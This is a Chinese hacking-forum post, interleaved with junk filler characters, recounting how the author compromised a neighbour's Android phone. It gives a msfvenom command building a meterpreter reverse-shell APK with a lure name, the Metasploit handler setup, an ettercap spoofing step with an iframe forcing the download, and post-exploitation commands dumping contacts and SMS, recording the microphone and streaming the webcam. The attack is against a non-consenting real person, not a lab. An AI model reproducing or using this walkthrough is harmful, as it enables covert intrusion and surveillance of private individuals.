找回密码
 立即注册
中国网络渗透测试联盟»论坛 --==渗透测试区{ Penetration testing area }==-- web app渗透测试::『Web App penetration testing』 metasploit+ettercap中间人攻击成功入侵邻居手机
欢迎中测联盟老会员回家,1997年注册的域名
返回列表 发新帖
查看: 1375|回复: 0
打印 上一主题 下一主题

metasploit+ettercap中间人攻击成功入侵邻居手机

[复制链接]
admin
跳转到指定楼层
楼主
发表于 2018-10-20 20:30:37 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式

+ E# b9 S1 _! |$ }/ l4 F- {/ J 五、msf+ettercap入侵邻居安卓手机 3 m9 Q* i( s6 n# e3 ]

0 F$ [) {1 c$ d& B0 A3 @

; G5 D% G3 `. j$ |; v6 a: j5 x 首先启动msf 5 x, R& t1 R# Q7 U

' a5 `. {. E$ j5 x3 T* c

, a! p3 g; u( S% _0 u6 O. d 先用kali生成一个安卓木马,如下命令: s5 n& n! b! e* C

& F" p5 D: o4 t- ^! k5 ?

( F0 D! Q3 E% T2 X' `; j; C Msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.0.109 LPORT=44444 -o ~/Desktop/ribenav.apk 3 Q, r- C2 h4 x- y

! r$ s G, V* z0 d6 t

* D5 ^, b0 k' z, _+ j& M& L 为了能让对方下载以后安装我这里将马的名字命名为ribenav.apk,哈哈邻居可是个“大色鬼”,就不适用替换下载的方法了,据我所知,邻居频繁使用手机浏览器浏览新闻 5 i" |$ ]& q* s/ s

" Z5 D/ \# [" N, x: A$ p

2 Q/ K9 l3 O- f. {& {( E) i! R 然后进入msf 2 d8 M- j2 L! p* {6 e

- B) H& V' P/ F

4 U( f- T# I7 T8 v use exploit/multi/handler 0 n V! u4 F- \9 P

8 D* t. O5 Z5 `0 w7 s. E

+ ?5 d) T8 N& ?/ Y9 a% B$ o set payload android/meterpreter/reverse_tcp : M: E2 K, X |- T

x5 n/ j, c" e3 p% t( ]

A7 `" o, ?0 S! B( ?9 I set LHOST 192.168.0.109 //ipkailiip 2 ]5 i2 g$ A+ D6 M1 q1 l

\7 H: a3 L( `$ w

; Y" J# i9 E* y- |9 M$ M+ F4 G! P set LPORT 44444 //端口一定要与前面生成的木马的端口一致 % F" p, R( z, I6 p% A

# @4 W! @5 O- R# z

) A/ t( j0 E( ]' q% J4 \8 a Exploit : p. v3 U( t3 I3 Y8 p9 i1 J; i# W

" u# o* e) o( n; T3 @

, e( N3 s% S* C   3 {0 _% `1 a8 Q* O, v

/ R( G' h7 B z$ e5 U( ]. U5 H

2 T% ]1 w& K* ^% O- z$ w. B0 C+ v* _ 下面我们开启ettercap -G 4 I" B* H5 E! @/ Z! c0 J" Z

: H9 U9 D, M. S

* m2 I8 S1 }- y) v9 G7 s1 e* w% X 我物理IP 1 z6 X/ l9 k( F9 i

( D3 Y ]7 v' V8 Q6 h! H! V0 w

6 g0 A. C7 T: {6 Z) H. F   6 g# u' l, T k1 V

4 x" p H2 D1 a2 L8 E$ ?6 T1 t5 @

) H% r% g' S* j 别到时候再把我物理机欺骗了,之前测试物理机只装腾讯管家是可以成功欺骗的, : |! { s( v$ ]! m- _

5 \6 l1 j' {' c l. O( d9 ]4 y

( Q& K. q+ D6 h 下面我们来设置一下 & r& O% S( }; N; N8 P

( N2 l, T5 K8 @. `$ o4 j

. i# k. d/ W8 r9 i   & d1 `+ e! ~) R) R% _" E' ~

& m. [# Y ?5 k7 U* f9 V

2 C& C9 E/ n& R8 G 在开启欺骗之前我们先把生成的apk马丢到kaili var/www/html下,并创建一个index.htm文件内容为:<iframe src=http://192.168.0.109/ribenav.apk></iframe>,因为apk文件嘛要想直接提示下载,用iframe语句就OK了, ; Z# ?! _ c8 r6 P& a- r0 U- v# ]" _

; _- Q1 Y, y3 r% f2 |3 ]

/ _3 v) V; W, y! L Y8 C   # t3 ?% O4 t5 {: _

9 j& T" E4 j' p8 n3 o j$ H

6 ]% k* J" w" Z0 I   3 @9 y6 ` ~7 R3 h

: Z# L3 }+ m9 e7 k$ N; c

8 O% S# Q7 o/ O1 \   9 P1 n2 m6 Z1 ?. E: \4 U4 D/ `* H

& L" A. H: c3 T

" [/ I# j/ J) S O9 Q   ! m6 U& a7 Q% ~: ^0 b

7 `9 Q! B$ Q2 d6 m' f7 r/ x

% B; N0 q4 J' s+ }0 x+ G) Q4 J   . a% Y6 `$ ?6 f' Q

/ S: x1 Q/ w. l2 r. ^# s+ ]

L2 v8 s4 P9 r1 B   & n* ]& @0 n- A% D( i

* B$ F8 Z! t2 x' ?

) E7 ~, U9 y+ v, v   7 _' U( U! N% B# a) Z2 [

3 [+ _3 S4 c$ l h2 i

& U# @! P3 C. M5 g" W& b; X1 W   ( _$ i! B+ N: B2 V3 V6 c

9 H0 H+ n* L" T' b( R$ H' d

6 A3 R! f( l" S* J   . {7 P3 i0 o* {3 I

) @* r4 U; H5 c2 K8 n

7 l% m+ W$ m- z   ! G8 P3 W& Z: a, y- s* z4 ^

# ~1 @3 U! d- R; h# `

" ^6 h( H) J. k' y   2 o7 x1 I3 L( D. p

% p% A7 L" D$ Z6 ]% g5 i

/ g- K6 \; r5 l4 D g   5 k& \' s7 f1 C' { c

' p' i7 G5 K* G

! u4 Z" u: ^: g   ) e9 w. i8 y* }8 e

& x8 |1 D8 e) b5 B! `. n

Q7 b2 q/ X- O: V 下面我们开始攻击 2 I" _( |! Z2 B/ b8 F3 ^# I: K2 H

3 l9 e8 k& S- r9 [+ m

" w7 Q: o( N9 u) d   * l; }$ Z* R7 s( M, X

5 \" d& E4 _0 Y/ c# o

3 U- q' g O( O6 j   , b# z0 _$ n8 o0 ~2 {- C

* b3 P, Q( n6 G( }& k

* d4 ~% Q$ L" R   8 {/ {: Y8 C4 S5 H0 j1 G& l

- `* d- y# i+ v1 n

/ T l U3 C; A   , s, R, ^5 e% Z" ~ G

9 @7 m3 F6 y# L- r4 M* |$ \

) `* A' l1 l/ `   ; v3 `+ {5 K5 y4 H9 F

4 Y" N8 l' X$ `# }; E1 `* a

+ Y& J6 G% \! J3 H9 Y 大概过了5分钟多,发现反弹成功了 " T. |) |$ Y. g) d

+ q( B3 s; W+ Q% p% m9 Z

' _2 ]" `5 l' |: v& K/ i   # h: _! Z' {" e' E8 R9 Y4 m

x. f0 O0 I$ J7 _) y

: _" j' [. @! p: C5 I   & k& A8 ?- J h4 _, K* h% M

5 p' g3 L" _+ b* S

( k6 p. K- e3 F& X$ m/ g# Q   3 v+ q% ?* o* \2 L9 y0 K0 j8 M

1 J$ c& b7 P$ m9 `. G. X5 Q: N

/ ~, ~0 d1 `* q0 @% Z- X5 @; U+ b4 v   7 ` I6 L! K2 M. T: l3 [0 N

3 c2 E8 @$ t: J( M D! }

9 d$ ~4 e/ T9 ~( T+ W0 d- b   ! I/ q9 r3 k2 m1 [; X. ~

: \5 H" Y: d0 c4 _- _

8 |5 i7 o4 c! i$ q$ m) G+ S   + E4 b& g, M6 q6 q( U+ b, }- W4 D& c

' p6 _6 {9 {( X" i0 H6 W9 I: ^9 z0 R

& @9 o* b% L9 |& C. ~' b; A: O   + |" s# Y% |6 _ f1 i' \

8 |* c9 b' C& S; M7 s$ e

, @- j, _# v! ?% f5 V: g 执行命令 : ?) G6 s, i4 O$ `

& z( D, w3 o( M$ s6 u, |, ~

9 E, k) ^( @" A! o) H+ \% |   6 `/ i" z' a$ j8 g0 O- D

9 c& a: J/ @. V" O7 d0 ^7 M1 X

. c) N D; N! K; d+ k& R dump_contacts    --》这个是导出电话 ) C5 v8 n" A: f; ^8 e& @

/ V1 \9 l# _# r. F) A

* ^6 D) B' v& F9 X dump_sms --》这个是导出信息 9 Z* C2 ^5 U2 \; w5 @2 {3 E

" e! p% Q6 N1 ~: e3 c

, l3 ]7 z8 i* q2 L) Y. r record_mic     Record audio from the default microphone for X seconds ' B$ B, f; X. Q- o$ V

' W1 R; e5 L- [1 @

% q( m3 @& y9 S5 U     webcam_chat    Start a video chat ' f0 f9 S% f! C8 ^ _( E2 s

7 c' p l$ b! `$ M/ b7 T" ]' W

+ h( M# p) ]( Y     webcam_list    List webcams + P" E" t7 T* T9 Z2 v8 e7 W) s) U

% v) ]0 [6 g8 @) y- l4 m

, Q5 G( e& T I2 _1 K* q0 T     webcam_snap    Take a snapshot from the specified webcam 7 m3 E c8 ]4 o

) @9 q! w0 K2 r! v ]( M- F

( {( d% ?) Z( k1 U" {1 P( D3 ~ webcam_stream  lay a video stream from the specified webcam 6 |, ^/ J" }) m* Y8 f6 S* Q

) H8 V0 L) _! d- a

9 S0 U' D# a: U# o9 B   $ Y; S6 D& `& S" A: u3 n

) V2 I* K ?( D' q9 e! t1 @

; E* z% W9 Y/ R* L% n- l; ]; R   0 s3 T+ p/ X7 x ~! S# F, j& k8 O

2 |4 z( B0 _- G9 U5 I. ?- q

$ ]' n) M0 G0 q. R9 ?8 k 我们打开看一下电话薄, . t* [* B+ B t. r

1 w9 D2 f" @3 U/ A( a& n

# K* h: _2 O2 f- I: @5 p: J   ; j1 j. S; y; O, n" U0 ^5 e; G$ k

4 _" r7 H- \3 ?* F8 H

9 U8 N; z r% i3 T% o   ; Q6 L& z, i+ R

/ Q3 X9 W6 G0 @- o/ L g

0 M7 w4 M1 \0 m4 s+ b$ s8 A7 Y( [( R1 `   & W- V' t; D+ R3 ^7 ~2 ]

3 }: S! T( c, C

& h2 ?8 ?, ]; B; Q" G   5 L p! a5 O2 n/ s8 I

! o+ V+ a0 Q C6 |- I. z( W8 ~

# r" R+ D% V/ i% ~3 y   4 }1 ]! ?1 @3 e- u% {0 \

# Q2 H* @; U, ]' |+ d" B; F+ Y, N# s8 N

: L: u$ z" v5 ^   + Q, s! w' I" i

5 \. i0 g# d; q0 U

* s+ ]+ x6 H) k1 {3 i( _; R 我们同时欺骗成DroidJack木马,使用方法如图: . D$ S+ p% j+ Z& J! ~9 Z

1 _0 @* P! x U; D3 t" {, s) O2 x

' ~5 w z9 b/ X7 h   3 e) n5 x$ F& A6 n

2 x! @4 N' L0 G2 e, D

; I9 Z7 ]5 _* d3 J x" B# r   ' i, H9 ^0 H& o" f

: V% T4 z3 U. Z5 ]8 R: S

+ _% N1 K* k4 C   : s) o! d6 Y3 |+ G- T

5 B7 {9 y7 ]2 u' u

5 j, ]# [6 ^; {/ H8 g2 a 切记在前面生成完马以后记得在这里选择开关为on,并且对应前面生成马的时候的端口 / \# k% u- U! S

1 r1 W. Z5 b4 `$ P) l

0 h* n9 ~& y9 u% C* o' }   & [7 A# I& A* s% u1 K

5 k0 a. E8 z5 R6 W) c

1 z' C/ c2 X- y   5 S! t; t' J5 p

6 N/ C5 v8 G. ?7 i

$ d- g7 J. p ?/ k+ Z   + x' f$ O5 q) U% J5 A2 H3 c

8 ~9 a) E' K: o0 f C& f( y1 [) n

$ M8 [+ f0 i0 e# q 9 Z2 J( i2 H( u& p# I! a

! R; F) c$ F# R ~+ ^$ j

& R/ L4 H+ W: u# x" ~
8 G) X+ L( p+ n( t0 S/ ?' n3 Q

回复

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Copyright © 2001-2013 Comsenz. All Rights Reserved - Powered by Discuz! X3.2
快速回复 返回顶部 返回列表